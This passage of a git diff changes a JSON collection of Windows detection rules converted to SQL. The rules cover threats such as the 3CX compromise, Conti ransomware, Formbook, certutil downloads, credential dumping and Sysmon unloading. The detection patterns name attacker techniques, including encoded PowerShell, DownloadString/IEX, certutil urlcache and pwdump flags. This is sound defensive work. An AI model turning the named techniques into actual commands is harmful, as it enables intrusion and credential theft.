ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1027" @@ -6786,18 +6616,18 @@ "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.resource_development", "attack.t1587.001" @@ -6807,90 +6637,86 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "status": "test", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "System administrator usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { "title": "Suspicious Child Process Created as System", @@ -6912,581 +6738,540 @@ "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", - "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", - "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of 